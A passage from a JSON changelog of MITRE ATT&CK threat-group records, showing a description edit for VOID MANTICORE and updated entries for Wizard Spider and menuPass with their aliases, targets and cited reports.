+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-23 01:46:56.261000+00:00\"}, \"root['description']\": {\"new_value\": \"[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran\\u2019s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE\\u2019s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) \", \"old_value\": \"[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran\\u2019s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including (LinkByld: C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE\\u2019s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) \"}}}",
+                    "previous_version": "1.0",
+                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to3__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to3__0\"><a href=\"#difflib_chg_to3__top\">t</a></td><td class=\"diff_header\" id=\"from3_1\">1</td><td nowrap=\"nowrap\">[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;is&nbsp;a</td><td class=\"diff_next\"><a href=\"#difflib_chg_to3__top\">t</a></td><td class=\"diff_header\" id=\"to3_1\">1</td><td nowrap=\"nowrap\">[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;is&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;threat&nbsp;group&nbsp;assessed&nbsp;to&nbsp;operate&nbsp;on&nbsp;behalf&nbsp;of&nbsp;Iran\u2019s&nbsp;Minist</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;threat&nbsp;group&nbsp;assessed&nbsp;to&nbsp;operate&nbsp;on&nbsp;behalf&nbsp;of&nbsp;Iran\u2019s&nbsp;Minist</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Citation:&nbsp;Check&nbsp;Poin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Citation:&nbsp;Check&nbsp;Poin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;Active&nbsp;since&nbsp;at&nbsp;le</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;Active&nbsp;since&nbsp;at&nbsp;le</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ast&nbsp;mid-2022,&nbsp;VOID&nbsp;MANTICORE&nbsp;has&nbsp;targeted&nbsp;government&nbsp;entitie</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ast&nbsp;mid-2022,&nbsp;VOID&nbsp;MANTICORE&nbsp;has&nbsp;targeted&nbsp;government&nbsp;entitie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,&nbsp;critical&nbsp;infrastructure,&nbsp;and&nbsp;private&nbsp;sector&nbsp;organizations</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,&nbsp;critical&nbsp;infrastructure,&nbsp;and&nbsp;private&nbsp;sector&nbsp;organizations</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;across&nbsp;Albania,&nbsp;Israel,&nbsp;and&nbsp;the&nbsp;United&nbsp;States.(Citation:&nbsp;Ch</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;across&nbsp;Albania,&nbsp;Israel,&nbsp;and&nbsp;the&nbsp;United&nbsp;States.(Citation:&nbsp;Ch</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eck&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eck&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Palo&nbsp;Alto&nbsp;VOID&nbsp;MANTICORE&nbsp;Iran&nbsp;Cyber&nbsp;Threats&nbsp;March&nbsp;2026)&nbsp;[VOI</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Palo&nbsp;Alto&nbsp;VOID&nbsp;MANTICORE&nbsp;Iran&nbsp;Cyber&nbsp;Threats&nbsp;March&nbsp;2026)&nbsp;[VOI</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">D&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;conducts</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">D&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;conducts</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;destructive&nbsp;cyber&nbsp;operations,&nbsp;combining&nbsp;wiper&nbsp;attacks&nbsp;with&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;destructive&nbsp;cyber&nbsp;operations,&nbsp;combining&nbsp;wiper&nbsp;attacks&nbsp;with&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hack-and-leak&nbsp;campaigns.&nbsp;The&nbsp;group&nbsp;has&nbsp;operated&nbsp;under&nbsp;multip</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hack-and-leak&nbsp;campaigns.&nbsp;The&nbsp;group&nbsp;has&nbsp;operated&nbsp;under&nbsp;multip</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;public-facing&nbsp;personas,&nbsp;including&nbsp;(<span class=\"diff_chg\">LinkByld</span>:<span class=\"diff_chg\">&nbsp;</span>C0038)&nbsp;in&nbsp;op</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;public-facing&nbsp;personas,&nbsp;including&nbsp;<span class=\"diff_add\">[HomeLand&nbsp;Justice]</span>(<span class=\"diff_chg\">http</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erations&nbsp;against&nbsp;Albania,&nbsp;Karma&nbsp;and&nbsp;Karma&nbsp;Below&nbsp;in&nbsp;campaigns</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">s</span>:<span class=\"diff_chg\">//attack.mitre.org/campaigns/</span>C0038)&nbsp;in&nbsp;operations&nbsp;against&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;targeting&nbsp;Israeli&nbsp;organizations,&nbsp;and&nbsp;Handala&nbsp;Hack,&nbsp;its&nbsp;curr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Albania,&nbsp;Karma&nbsp;and&nbsp;Karma&nbsp;Below&nbsp;in&nbsp;campaigns&nbsp;targeting&nbsp;Israel</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ent&nbsp;primary&nbsp;persona,&nbsp;which&nbsp;has&nbsp;claimed&nbsp;activity&nbsp;against&nbsp;Isra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">i&nbsp;organizations,&nbsp;and&nbsp;Handala&nbsp;Hack,&nbsp;its&nbsp;current&nbsp;primary&nbsp;perso</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eli&nbsp;and&nbsp;U.S.&nbsp;entities,&nbsp;including&nbsp;a&nbsp;March&nbsp;2026&nbsp;attack&nbsp;against</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">na,&nbsp;which&nbsp;has&nbsp;claimed&nbsp;activity&nbsp;against&nbsp;Israeli&nbsp;and&nbsp;U.S.&nbsp;enti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Stryker&nbsp;Corporation.(Citation:&nbsp;Check&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;H</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ties,&nbsp;including&nbsp;a&nbsp;March&nbsp;2026&nbsp;attack&nbsp;against&nbsp;Stryker&nbsp;Corporat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">andala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;DOJ&nbsp;FBI&nbsp;Handala&nbsp;Hack&nbsp;March</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion.(Citation:&nbsp;Check&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2026)&nbsp;&nbsp;[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G10</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2026)(Citation:&nbsp;DOJ&nbsp;FBI&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;&nbsp;[VOID&nbsp;MAN</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">55)&nbsp;has&nbsp;been&nbsp;observed&nbsp;collaborating&nbsp;with&nbsp;Scarred&nbsp;Manticore,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">TICORE](https://attack.mitre.org/groups/G1055)&nbsp;has&nbsp;been&nbsp;obse</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">which&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;initial&nbsp;access&nbsp;operations&nbsp;preceding</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rved&nbsp;collaborating&nbsp;with&nbsp;Scarred&nbsp;Manticore,&nbsp;which&nbsp;has&nbsp;been&nbsp;li</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;VOID&nbsp;MANTICORE\u2019s&nbsp;activity.(Citation:&nbsp;Domain&nbsp;Tools&nbsp;Handala&nbsp;H</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nked&nbsp;to&nbsp;initial&nbsp;access&nbsp;operations&nbsp;preceding&nbsp;VOID&nbsp;MANTICORE\u2019s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ack&nbsp;Karma&nbsp;Homeland&nbsp;Justice&nbsp;MOIS&nbsp;April&nbsp;2026)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;activity.(Citation:&nbsp;Domain&nbsp;Tools&nbsp;Handala&nbsp;Hack&nbsp;Karma&nbsp;Homelan</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;Justice&nbsp;MOIS&nbsp;April&nbsp;2026)&nbsp;</td></tr>\n        </tbody>\n    </table>"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-12 18:15:29.396000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Wizard Spider",
+                    "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)",
+                    "aliases": [
+                        "Wizard Spider",
+                        "UNC1878",
+                        "TEMP.MixMaster",
+                        "Grim Spider",
+                        "FIN12",
+                        "GOLD BLACKBURN",
+                        "ITG23",
+                        "Periwinkle Tempest",
+                        "DEV-0193",
+                        "Pistachio Tempest",
+                        "DEV-0237"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0102",
+                            "external_id": "G0102"
+                        },
+                        {
+                            "source_name": "Grim Spider",
+                            "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
+                        },
+                        {
+                            "source_name": "UNC1878",
+                            "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)"
+                        },
+                        {
+                            "source_name": "TEMP.MixMaster",
+                            "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
+                        },
+                        {
+                            "source_name": "ITG23",
+                            "description": "(Citation: IBM X-Force ITG23 Oct 2021)"
+                        },
+                        {
+                            "source_name": "FIN12",
+                            "description": "(Citation: Mandiant FIN12 Oct 2021)"
+                        },
+                        {
+                            "source_name": "Periwinkle Tempest",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "DEV-0193",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Pistachio Tempest",
+                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
+                        },
+                        {
+                            "source_name": "DEV-0237",
+                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
+                        },
+                        {
+                            "source_name": "GOLD BLACKBURN",
+                            "description": "(Citation: Secureworks Gold Blackburn Mar 2022)"
+                        },
+                        {
+                            "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020",
+                            "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a"
+                        },
+                        {
+                            "source_name": "FireEye Ryuk and Trickbot January 2019",
+                            "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html"
+                        },
+                        {
+                            "source_name": "CrowdStrike Ryuk January 2019",
+                            "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
+                        },
+                        {
+                            "source_name": "CrowdStrike Grim Spider May 2019",
+                            "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/"
+                        },
+                        {
+                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
+                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft_PistachioTempest_Jan2024",
+                            "description": "Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.",
+                            "url": "https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest"
+                        },
+                        {
+                            "source_name": "CrowdStrike Wizard Spider October 2020",
+                            "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.",
+                            "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/"
+                        },
+                        {
+                            "source_name": "Secureworks Gold Blackburn Mar 2022",
+                            "description": "Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/gold-blackburn"
+                        },
+                        {
+                            "source_name": "Mandiant FIN12 Oct 2021",
+                            "description": "Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.",
+                            "url": "https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf"
+                        },
+                        {
+                            "source_name": "IBM X-Force ITG23 Oct 2021",
+                            "description": "Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.",
+                            "url": "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Oleksiy Gayda"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "4.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-01-20 16:26:04.859000+00:00\"}}}",
+                    "previous_version": "4.1"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:09.054000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "menuPass",
+                    "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)\n\n[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)",
+                    "aliases": [
+                        "menuPass",
+                        "Cicada",
+                        "POTASSIUM",
+                        "Stone Panda",
+                        "APT10",
+                        "Red Apollo",
+                        "CVNX",
+                        "HOGFISH",
+                        "BRONZE RIVERSIDE"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0045",
+                            "external_id": "G0045"
+                        },
+                        {
+                            "source_name": "HOGFISH",
+                            "description": "(Citation: Accenture Hogfish April 2018)"
+                        },
+                        {
+                            "source_name": "POTASSIUM",
+                            "description": "(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)"
+                        },
+                        {
+                            "source_name": "Stone Panda",
+                            "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)"
+                        },
+                        {
+                            "source_name": "APT10",
+                            "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)"
+                        },
+                        {
+                            "source_name": "menuPass",
+                            "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)"
+                        },
+                        {
+                            "source_name": "Red Apollo",
+                            "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)"
+                        },
+                        {
+                            "source_name": "CVNX",
+                            "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)"
+                        },
+                        {
+                            "source_name": "BRONZE RIVERSIDE",
+                            "description": "(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)"
+                        },
+                        {
+                            "source_name": "Cicada",
+                            "description": "(Citation: Symantec Cicada November 2020)"
+                        },
+                        {
+                            "source_name": "Accenture Hogfish April 2018",
+                            "description": "Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.",
+                            "url": "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+                        },
+                        {
+                            "source_name": "SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022",
+                            "description": "Counter Threat Unit Research Team . (2022, June 23). BRONZE STARLIGHT RANSOMWARE OPERATIONS USE HUI LOADER. Retrieved December 7, 2023.",
+                            "url": "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader"
+                        },
+                        {
+                            "source_name": "Crowdstrike CrowdCast Oct 2013",
+                            "description": "Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved November 17, 2024.",
+                            "url": "https://www.slideshare.net/slideshow/crowd-casts-monthly-you-have-an-adversary-problem/27262315"
+                        },
+                        {
+                            "source_name": "FireEye APT10 April 2017",
+                            "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html"
+                        },
+                        {
+                            "source_name": "FireEye Poison Ivy",
+                            "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved September 19, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/rpt-poison-ivy.pdf"
+                        },
+                        {
+                            "source_name": "FireEye APT10 Sept 2018",
+                            "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html"
+                        },
+                        {
+                            "source_name": "Palo Alto menuPass Feb 2017",
+                            "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/"
+                        },
+                        {
+                            "source_name": "PWC Cloud Hopper April 2017",
+                            "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.",
+                            "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf"
+                        },
+                        {
+                            "source_name": "Symantec Cicada November 2020",
+                            "description": "Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.",
+                            "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage"
+                        },
+                        {
+                            "source_name": "DOJ APT10 Dec 2018",
+                            "description": "United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.",
+                            "url": "https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion"
+                        },
+                        {
+                            "source_name": "District Court of NY APT10 Indictment December 2018",
+                            "description": "US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.",
+                            "url": "https://www.justice.gov/opa/page/file/1122671/download"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Michael Cox"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-11-17 23:19:12.450000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
